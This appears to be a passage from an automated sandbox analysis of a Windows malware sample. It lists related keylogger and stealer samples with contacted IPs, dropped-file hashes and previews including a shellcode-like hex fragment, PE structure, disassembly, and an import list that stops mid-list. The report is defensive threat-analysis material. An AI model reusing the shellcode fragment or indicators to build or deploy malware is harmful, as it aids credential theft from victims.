                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Sylacauga AL License.msgGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\Desktop\W2k2NLSvja.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):149880
                                                                                                                      Entropy (8bit):7.960534062910016
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1mRkwLZ8vf0JarUIoi2Mn0+S0ZgZIc2amz+nRy7TKKBqkT0mGrU7N:akCZJwTHJSruCRwqmGQ7N
                                                                                                                      MD5:53E7660E3D0D199864A9BD0DEBFA00CA
                                                                                                                      SHA1:506E74CE5958EADC98DB7EA2F1EECA66B3D949BB
                                                                                                                      SHA-256:6F7F79309ECDBE07FB45EB508EA68262406A9DD9B544BD54B68F54EFF33A88B4
                                                                                                                      SHA-512:0441D19CE0CA77F985EEB5AE979FF8923F952717604F730F1C1CD15663DBC15B8774598845BAD7EDEB2514761A69F15E31C7049AED147F0466C3D38C85E2EB94
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06.....[8s:|.V.V).}~..E...5..j.4.MiU...mS....J...P.Ph.p.....q...+4..Z...l../.p...x..q>.M....9.Me....3.Nl...V=...+.Y...;.Nm....Dh4X..eQ.W.u .|..t.Z.[.S....C.t..1.Tn`....tF.....G....9..Wk.R.V)....b;...I8...Z..$.t.../.H.:...:a........L.3j../..E..5:h..k.J..>.u...+....*er.W.......7.W.n.j...%..@...t]'.ZU..t....>.<.u.M.5J..S...5J.Z.Z../.P..'E.D@+.8....;F@...4.....*.T........... ...w.9N....vg.o...w.I.BoJ.W...;.:"..h..f.:...D..t......r...H@.....W.W.`......:...B.G.F&.....6...J.r.r.I.UJ.?.F..f2.4.q?.T.tY../L.Wz..:.#..h..8.9^.D..Z.F.E.U.1i.SQL.S.....W..j\.}.i8.X..:<z.3.O....b....4Ze.'Q....I.....V&.9...W.T%.z.B....?..]b.p.W/w....3.G.....W.T-T[.\..1..~.S..&.9..-).V....B.c..(...z.o.N..Z.N....k.J.J.X.]e.Z...l....J...a..l...0.U......T.....AZ.."s[..[S.W,.K..IO.U.....9..t..JWH...:.4..P.N..[...5.J0.:....\^gTY.Vgf.U..`.".;...{.n.;........M..H..EB. .B@.J..WZ..=`/%...S#....Q..6@..gK5.S.+]*.{..s.d.+..+...P......\.U..@..T..Q..(.{.*.m...5...m.Mi..X.s..Uu
                                                                                                                      Process:C:\Users\user\Desktop\W2k2NLSvja.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9922
                                                                                                                      Entropy (8bit):7.600307719587995
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZyaFcKwsKp488BV5EX9O1JZob0pcjxLB+qIQDQwppf1zkMY4bN/vsZLL:3F7wsKp48Yk9ObcgcdLCQDQUBTN/kZLL
                                                                                                                      MD5:1AB85B7681D3CC3D8ABA7663D3005C8C
                                                                                                                      SHA1:5E83108B5BF3F7DE96185BDFCF628C87AC2EB46B
                                                                                                                      SHA-256:A5CB5C70A8C4164E9FB76433C7047DF4B08F78CE323B3109A5C5BB77CA6073C8
                                                                                                                      SHA-512:C555F9EFA21FC1990176CA35EF921801774ED4E829390FE43DF2039D455655F58224643777F127C92095DA06B5631C6F8194D971CF90D41224B67EA17D0F815C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&
                                                                                                                      Process:C:\Users\user\Desktop\W2k2NLSvja.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):273920
                                                                                                                      Entropy (8bit):6.980734116012845
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:xrXOEmatWNP1KVj211+3szicMoX1igYjp/8Oofk:xraakNP1KVK11+3szicMoX1jYt/8O9
                                                                                                                      MD5:CDEDDD67555C870A0A8602CF341A60CB
                                                                                                                      SHA1:82B88F9FAE85BBDEF26799299EE6DC0AE5E860F8
                                                                                                                      SHA-256:EA46C0C079DFF1CA71C67FF8D43989D1363E844B3E62A9918E8B4CDABBDCDE0F
                                                                                                                      SHA-512:3F90B8A52BDC7124A526DFA22893132D1945106E4256BEEFE7E6288275349929D03B3408994173A452A2ED79B456DF1603E3DB14D5F6D7F843AE3AA1533A7E20
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.l.3O4WV^XNW..AE.G1Q5ZE4x5JQSE6S3L4WVZXNWPTAEWG1Q5ZE485JQSE6.3L4YI.VN.Y.`.V..pa2,G.E8>47W>./U985,n55t309gX?...g.X%56k;^9h4WVZXNW..AE.F2Q.^.R85JQSE6S.L6V][.NWHPAECG1Q5ZEj.1JQsE6SsH4WV.XNwPTAGWG5Q5ZE485NQSE6S3L4.RZXLWPTAEWE1..ZE$85ZQSE6C3L$WVZXNW@TAEWG1Q5ZE44.NQ.E6S3.0WAJXNWPTAEWG1Q5ZE485JQ3A6_3L4WVZXNWPTAEWG1Q5ZE485JQSE6S3L4WVZXNWPTAEWG1Q5ZE485jQSM6S3L4WVZXNWXtAE.G1Q5ZE485JQ}1S+GL4W2L\NWpTAEOC1Q7ZE485JQSE6S3L4wVZ8`%#&"EWG&A5ZEt<5JCSE6I7L4WVZXNWPTAEW.1Qut7QTZ)QSI6S3LTSVZZNWPxEEWG1Q5ZE485JQ.E6.3L4WVZXNWPTAEWG1..^E485J.SE6Q3I4..XX..QTBEWG.Q5\..:5.QSE6S3L4WVZXNWPTAEWG1Q5ZE485JQSE6S3L4WVZXNW.).J...8F..485JQSD4P7J<_VZXNWPTA;WG1.5ZEt85JfSE6v3L4:VZXjWPT?EWGOQ5Z!4858QSEWS3LsWVZ7NWP:AEW91Q5DG..5J[yc6Q.m4W\Zr.$rTAO.F1Q1)f48?.SSE2 .L4].YXNS#qAE].5Q5^6.85@.VE6W..4T.L^NWK;xEWM1R.OC48.`wSG.i3L>W||XM.ERAELm.Q7.L481`. X6S5dwWVP,GWPV.OWG5{+Xmp85@{q;=S3H.W|x&BWPPjE}eO\5ZA.8.TS.H6S7f.)XZXJ|P~c;XG1U.Zo*:.EQSA.qM\4WRqXdu.EAESl1{.$W481aQygH@3L0|Vpz0CPTEnWm./ ZE0.5`s-S6S7g4}t$ONWT.Aou9)Q5^n4.+H.KE6W.F4}Pp:N%vB
                                                                                                                      Process:C:\Users\user\Desktop\W2k2NLSvja.exe
                                                                                                                      File Type:ASCII text, with very long lines (28756), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28756
                                                                                                                      Entropy (8bit):3.602387961033279
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNba+I468b4vfF3if6gygP:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rv
                                                                                                                      MD5:0A6332F1BC58F389E778016D89F411FD
                                                                                                                      SHA1:537C4868E441122D0EA42C36D4CB3E960BD1E491
                                                                                                                      SHA-256:A97A78DF1FCB17EAAA4B6D48F68936EA865FE0EBAE0311A3E360311B060EEEF1
                                                                                                                      SHA-512:54072BBBFC91CE1B39E0576A71C210FFA384A7B0FEF0F1E71B8E19DB64AF1272A6B28E62C2815AD014C77211B3C31CA4ED40937BE5A4977CBD8AB94C756B747D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.969698004676455
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:W2k2NLSvja.exe
                                                                                                                      File size:1'056'256 bytes
                                                                                                                      MD5:3e473d16c81dd66fee6f02537b601626
                                                                                                                      SHA1:82f7667f0d8aecc63ce5fb9d86ec3d651223676d
                                                                                                                      SHA256:3c81cd20323c282181d40fa0e8ab7b66dfd46edd7bafc3d6abeb072420b314fe
                                                                                                                      SHA512:7f3ff26741dd497f8c2f8fb9a63de6c16140203446d35b277be71031070c882c97171448f8b15346f04868b5630d5ff99af101cc3b1f66345b053acd386fcc28
                                                                                                                      SSDEEP:24576:FAHnh+eWsN3skA4RV1Hom2KXMmHapvZqN9y7gYaM5:0h+ZkldoPK8YapvZO9y7Vt
                                                                                                                      TLSH:F725AD0273D1C036FFABA2739B6AF20556BD79254123852F13981DB9BD701B2263E763
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                                                      Entrypoint:0x42800a
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x66905CB7 [Thu Jul 11 22:29:11 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                      Instruction
                                                                                                                      call 00007F20D915EE4Dh
                                                                                                                      jmp 00007F20D9151C04h
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      push edi
                                                                                                                      push esi
                                                                                                                      mov esi, dword ptr [esp+10h]
                                                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                                                      mov eax, ecx
                                                                                                                      mov edx, ecx
                                                                                                                      add eax, esi
                                                                                                                      cmp edi, esi
                                                                                                                      jbe 00007F20D9151D8Ah
                                                                                                                      cmp edi, eax
                                                                                                                      jc 00007F20D91520EEh
                                                                                                                      bt dword ptr [004C41FCh], 01h
                                                                                                                      jnc 00007F20D9151D89h
                                                                                                                      rep movsb
                                                                                                                      jmp 00007F20D915209Ch
                                                                                                                      cmp ecx, 00000080h
                                                                                                                      jc 00007F20D9151F54h
                                                                                                                      mov eax, edi
                                                                                                                      xor eax, esi
                                                                                                                      test eax, 0000000Fh
                                                                                                                      jne 00007F20D9151D90h
                                                                                                                      bt dword ptr [004BF324h], 01h
                                                                                                                      jc 00007F20D9152260h
                                                                                                                      bt dword ptr [004C41FCh], 00000000h
                                                                                                                      jnc 00007F20D9151F2Dh
                                                                                                                      test edi, 00000003h
                                                                                                                      jne 00007F20D9151F3Eh
                                                                                                                      test esi, 00000003h
                                                                                                                      jne 00007F20D9151F1Dh
                                                                                                                      bt edi, 02h
                                                                                                                      jnc 00007F20D9151D8Fh
                                                                                                                      mov eax, dword ptr [esi]
                                                                                                                      sub ecx, 04h
                                                                                                                      lea esi, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [edi], eax
                                                                                                                      lea edi, dword ptr [edi+04h]
                                                                                                                      bt edi, 03h
                                                                                                                      jnc 00007F20D9151D93h
                                                                                                                      movq xmm1, qword ptr [esi]
                                                                                                                      sub ecx, 08h
                                                                                                                      lea esi, dword ptr [esi+08h]
                                                                                                                      movq qword ptr [edi], xmm1
                                                                                                                      lea edi, dword ptr [edi+08h]
                                                                                                                      test esi, 00000007h
                                                                                                                      je 00007F20D9151DE5h
                                                                                                                      bt esi, 03h
                                                                                                                      Programming Language:
                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                      • [LNK] VS2013 UPD5 build 40629
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x37718.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000x7134.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0xc80000x377180x37800405235c6cbfd958dbe75dec9d2b1125aFalse0.8842465512387387data7.791286429609028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x1000000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                      RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                      RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                      RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                      RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                      RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                      RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                      RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                      RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                      RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                      RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                      RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                      RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                      RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                      RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                      RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                      RT_RCDATA0xd04100x2edb0data1.0003438932888704
                                                                                                                      RT_GROUP_ICON0xff1c00x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                      RT_GROUP_ICON0xff2380x14dataEnglishGreat Britain1.15
                                                                                                                      RT_VERSION0xff24c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                      RT_MANIFEST0xff3280x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                      DLLImport
                                                                                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                      UxTheme.dllIsThemeActive
                                                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, 